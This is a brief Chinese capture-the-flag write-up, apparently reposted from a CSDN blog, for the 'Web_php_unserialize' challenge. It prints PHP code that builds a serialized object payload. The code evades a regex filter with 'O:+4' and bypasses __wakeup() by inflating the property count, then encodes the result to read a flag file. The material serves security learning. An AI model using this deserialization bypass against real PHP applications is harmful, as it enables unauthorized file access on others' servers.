攻防世界-Web_php_unserialize详解-CSDN博客
上述为借鉴地址。
攻防世界
Web_php_unserialize
用来绕过正则和__wakeup()的php代码:
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
}
$xx = new Demo("fl4g.php");
$c = serialize($xx);
echo $c;
echo "<br/>";
$d = str_replace('O:4', 'O:+4',$c);//绕过preg_match
$d = str_replace(':1:', ':2:',$d);//绕过wakeup
echo $d;
echo "<br/>";
echo(urlencode($d));
echo "<br/>";
$f = base64_encode($d);
echo $f;
涉及的知识点:
1、php对象属性数量比实际多时,反序列化会绕过__wakeup();
2、php对象不同属性 private public(默认) protected序列化后的结果不同,不要轻易复制序列化结果,最好采用代码处理;
3、如何绕过正则规则 /[oc]:\d+:/i对O:4:的匹配:
php 5中漏洞O:+4: 还是会被反序列化函数正确识别,同时可以绕过上述规则。